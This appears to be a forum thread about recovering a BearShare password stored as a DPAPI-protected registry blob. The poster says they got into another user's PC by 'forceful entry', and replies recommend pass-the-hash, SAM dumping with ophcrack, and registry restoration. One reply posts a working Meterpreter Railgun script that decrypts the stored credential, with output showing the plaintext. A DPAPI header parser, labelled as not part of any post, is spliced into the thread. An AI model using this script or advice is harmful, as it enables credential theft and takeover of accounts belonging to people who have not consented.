Decrypting a Hex code from Registry


Mycael

Greetings!

I'm having a problem with a hex-code password from a registry file. It's related to Bearshare.

I fed in a hex to ASCII converter, and this string pops out:

Ð Ñ O eMž í» EncryptedString ü ©c \ °·Ûv â Ë ¥ ³ M3æ ¥Ç" ïr©ÜVâ5à $l Ž

Lol, any help would be greatly appreciated. Thanks!

> Registry Contents below:

"Password"=hex:01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,01,\
00,00,00,90,ae,9f,9f,65,be,4d,48,9e,ae,18,17,ed,13,bb,75,00,00,00,00,20,00,\
00,00,45,00,6e,00,63,00,72,00,79,00,70,00,74,00,65,00,64,00,53,00,74,00,72,\
00,69,00,6e,00,67,00,00,00,10,66,00,00,00,01,00,00,20,00,00,00,fc,91,a9,72,\
63,dc,5c,a3,b0,09,b7,e9,db,6c,76,e7,00,00,00,00,04,80,00,00,a0,00,00,00,10,\
00,00,00,e2,09,cb,36,0d,35,a5,d8,b3,a8,4d,70,33,50,e6,5d,10,00,00,00,09,11,\
a5,f6,c7,52,22,29,ef,9b,72,55,a9,84,dc,17,14,00,00,00,01,6f,56,7c,e2,65,35,\
04,e0,5a,81,24,24,77,6c,d1,8e,bd,05,40
"AutoConnect"=dword:00000001
"RememberPassword"=dword:00000001
"Default"=dword:00000001
"Status"=dword:00000001
"Guest"=dword:00000000
"LoginUserType"=dword:00000000
"ActiveTabInSearch"=dword:00000000
"ActiveTabInWeb"=dword:00000000
"AdditionalResults"=dword:0000002d


It's not straight hex, it's like binary or encrypted data mixed in. I stripped some of the data out just so you can see the readable string part:

Ð ß Ñ z ÀOÂ ë ® e¾MH ® í »u E n c r y p t e d S t r i n g f ü ©rcÜ\£° ·éÛlvç   â Ë6
5¥Ø³¨Mp3Pæ] ¥öÇR")ï rU© Ü oV|âe5 àZ $$wlÑ ½ @
 
You can use http://home.paulschou.net/tools/xlate/ to decode hex, but this has probably got more to it than just hex in it.

Edited by digip

Thing is, the account of said "user" had his password changed forcefully by an administrative account.

This change invalidated all stored passwords, including this one.

Before this happened, however, I managed to back up this registry thinking it could be of use.

This password being user & password dependent makes me wonder if there are other means to decipher the contents of this hex. I still have access to the user's PC and account. (After forceful entry, of course)

Wondering if it's possible to revert the user's account settings to the before-forceful-entry. Any ideas?

Thanks for the earlier posts. Really appreciate them :)


If you have the original key, and access to the user's session, under their sign-on, you can replace the reg key, then yes, it will put it back, but that depends on your level of access and lockdown of registry, group policy, etc. It's easier to log in to the user's session with the current password, and just change it via control panel, but if it's a domain login, the password is a different setup, one for local login, one for domain, which is controlled by the domain controller and the user's session is logging in remotely. Cached credentials can sometimes be pulled depending on if they left default group policy settings in effect, you can also bypass all of it with a pass the hash attack to just use the token shared between live sessions.

If the password is what you want to decrypt though, grab the SAM database and use something like ophcrack to retrieve the password, but that probably only contains the local admin pass and not the domain pass. I'm not 100% sure how to get a domain password for a user but I imagine it's probably a hashed key like you showed above that is decrypted during login with some function at the domain controller end. Been so long since I've even had to think about these processes since MCSE classes, I don't even remember how the storage works any more, and with Windows Server 2008 I know the data is backwards compatible but also has newer secure storage of data that may be diff than say, working on Win2000 and Win2003.

Best guy to ask that would probably know, is Mubix.


Ya, it was password stored in the users store. Wrote a quick script to decrypt: (mostly stolen from post/windows/gather/credentials/outlook.rb)

# Load crypt32 into Railgun if it is not already available.
def prepare_railgun
  rg = session.railgun
  rg.add_dll('crypt32') unless rg.get_dll('crypt32')
end

# Decrypt a DPAPI blob by calling CryptUnprotectData inside the session's
# own process, i.e. in the context of the logged-on user.
def decrypt_password(data)
  rg = session.railgun
  pid = client.sys.process.getpid
  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

  # Copy the blob into the process; size the buffer to the data
  # instead of a fixed 128 bytes (the blob is longer than that).
  mem = process.memory.allocate(data.length)
  process.memory.write(mem, data)

  # Build the DATA_BLOB (length + pointer) for the process architecture.
  if session.sys.process.each_process.find { |i| i["pid"] == pid }["arch"] == "x86"
    addr = [mem].pack("V")
    len = [data.length].pack("V")
    ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
    #print_status("#{ret.inspect}")
    len, addr = ret["pDataOut"].unpack("V2")
  else
    addr = [mem].pack("Q")
    len = [data.length].pack("Q")
    ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
    len, addr = ret["pDataOut"].unpack("Q2")
  end

  # A zero-length output blob means the call did not decrypt anything.
  return "" if len == 0
  process.memory.read(addr, len)
end

# Read a value from the BearShare user key in the current user's hive.
def get_valdata(k, name)
  @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com'
  registry_getvaldata("#{@key_base}\\#{k}", name)
end

prepare_railgun
data = get_valdata("", 'Password')
print_error data.inspect
password = decrypt_password(data)
print_status password.inspect

And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password'

meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
x9E\xC11.d\x96\x95 \xC6"
[*] "password\x00"

I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator:

meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
x9E\xC11.d\x96\x95 \xC6"
[*] ""

No joy (as expected)

Edited by mubix
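
Added example, not part of any post in this thread: the Password value begins with the fixed DPAPI blob header, which can be read without decrypting anything. This Ruby sketch parses that header from the first 88 bytes of the value posted at the top of the thread; the function names are illustrative.

```ruby
# Added example: parse the fixed header of a DPAPI blob from a .reg "hex:" value.
DPAPI_PROVIDER = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb" # well-known DPAPI provider GUID

# First 88 bytes of the "Password" value posted at the top of this thread.
REG_VALUE = <<~'REG'
  hex:01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,01,\
  00,00,00,90,ae,9f,9f,65,be,4d,48,9e,ae,18,17,ed,13,bb,75,00,00,00,00,20,00,\
  00,00,45,00,6e,00,63,00,72,00,79,00,70,00,74,00,65,00,64,00,53,00,74,00,72,\
  00,69,00,6e,00,67,00,00,00,10,66,00,00,00,01,00,00
REG

# Convert .reg hex text (commas, backslash line continuations) to raw bytes.
def reg_hex_to_bytes(text)
  hex = text.strip.sub(/\Ahex(\(\h+\))?:/, "").delete("^0-9a-fA-F")
  raise ArgumentError, "odd number of hex digits" if hex.length.odd?
  [hex].pack("H*")
end

# Windows GUIDs store their first three fields little-endian.
def guid(raw)
  d1, d2, d3 = raw.unpack("Vvv")
  format("%08x-%04x-%04x-%s-%s", d1, d2, d3,
         raw[8, 2].unpack1("H*"), raw[10, 6].unpack1("H*"))
end

# Layout: version, provider GUID, master key version, master key GUID,
# flags, description length, UTF-16LE description, cipher ALG_ID, key bits.
def parse_dpapi_header(blob)
  raise ArgumentError, "too short for a DPAPI header" if blob.bytesize < 48
  unless blob.unpack1("V") == 1 && guid(blob[4, 16]) == DPAPI_PROVIDER
    raise ArgumentError, "not a DPAPI blob"
  end
  flags, desc_len = blob[40, 8].unpack("VV")
  if desc_len.odd? || 48 + desc_len + 8 > blob.bytesize
    raise ArgumentError, "description length does not fit the blob"
  end
  desc = blob[48, desc_len].force_encoding("UTF-16LE").encode("UTF-8").delete("\0")
  alg, alg_bits = blob[48 + desc_len, 8].unpack("VV")
  { master_key_guid: guid(blob[24, 16]), flags: flags, description: desc,
    alg_crypt: alg, alg_bits: alg_bits }
end

if __FILE__ == $PROGRAM_NAME
  info = parse_dpapi_header(reg_hex_to_bytes(REG_VALUE))
  info.each { |k, v| puts "#{k}: #{v.is_a?(Integer) ? format('0x%x', v) : v}" }
end
```

The master_key_guid names the per-user master key file (under %APPDATA%\Microsoft\Protect\<SID>\) that CryptUnprotectData needs, which is why the same bytes imported under 'bob' came back as an empty string.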

If you still have the ability to log in as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with Bearshare installed) I was still able to decrypt the Bearshare password.
